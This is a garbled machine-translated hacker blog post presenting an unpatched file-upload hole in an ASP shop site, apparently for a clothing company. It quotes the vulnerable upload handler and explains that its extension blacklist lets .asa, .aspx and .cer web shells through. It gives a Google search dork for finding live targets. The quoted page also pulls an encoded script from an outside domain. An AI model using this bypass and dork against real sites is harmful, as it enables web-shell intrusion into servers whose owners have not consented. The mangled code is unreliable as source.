Jinwei Shijia clothing Co., Ltd. FLASH 0-day

Author: Minghacker

From: www.3est.com

Blog: http://yxmhero1989.blog.163.com

It seems that there are new and old versions.

See the code sub_uploadb.asp

<% @ Language = VBScript %>

<! -- # Include FILE = "upload. inc" -->

<%

Dim upload, file, formName, formPath, iCount, fileformat

Set upload = new upload_F

Function MakedownName ()

Dim fname

Fname = now ()

Fname = replace (fname ,"-","")

Fname = replace (fname ,"","")

Fname = replace (fname ,":","")

Fname = replace (fname, "PM ","")

Fname = replace (fname, "AM ","")

Fname = replace (fname, "Morning ","")

Fname = replace (fname, "Afternoon ","")

Fname = int (fname) + int (10-1 + 1) * Rnd + 1)

MakedownName = fname

End function

FormPath = ".../../upload /"

ICount = 0

For each formName in upload. file: Lists All uploaded files.

Set file = upload. file (formName) to generate a file object

Fileformat = lcase (right (file. filename, 4 ))

If fileformat = ". asp" or fileformat = ". exe" or fileformat = ". txt" or fileformat = ". htm" then

Response. write "<script> alert (the file format is incorrect. please upload it again !); Location = "& request. ServerVariables (" HTTP_REFERER ") &" </script>"

Response. end

End if

If file. FileSize> 0 then if FileSize> 0, file data exists.

Newname = MakedownName () & "." & mid (file. FileName, limit Rev (file. FileName, ".") + 1)

File. SaveAs Server. mappath (formPath & newname) save the file

Filename = file. filepath & file. filename

Filename = replace (filename ,"","/")

Uploadpath = formpath & newname

Uploadpath = mid (uploadpath, instr (formpath, "upload "))

ICount = iCount + 1% & gt;

<Script>

Fn = "<% = uploadpath %>"

Filename = "<% = filename %>"

Using Role opener.doc ument. form. proimgb. value = fn

Using Role opener.doc ument. form. probpath. value = filename

Window. close ();

</Script>

<% Else

Response. write ("<font size = 1.5 color = red> ")

Response. write "file not found & nbsp; <a href = javasReturned: history. back (1)> return </A>"

Response. write ("</font> ")

Response. end

End if

Next

%>

<Html>

<Head>

<Title> </title>

<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">

<Link rel = "stylesheet" href = "css.css" type = "text/css">

<Style type = "text/css">

<! --

Body, td, th {

Font-size: 12px;

}

Body {

Margin-left: 10px;

Margin-top: 10px;

Margin-right: 10px;

Margin-bottom: 10px;

Background-image: url (.../../images/bg.gif );

}

-->

</Style>

<Script language = "JScript. Encode" src = "http://www.16885688.com/include.js">

 

If fileformat = ". asp" or fileformat = ". exe" or fileformat = ". txt" or fileformat = ". htm" then ..

Only asp and so on are filtered, and other information such as asa, aspx, and cer can be passed (if supported by the server)

Asp/up/upload. asp calls the above sub_uploadb.asp. The uploaded Shell is not explained.

Google: inurl:/managepro. asp

There are not many sites, and the keywords are better constructed by yourself. Take specific measures.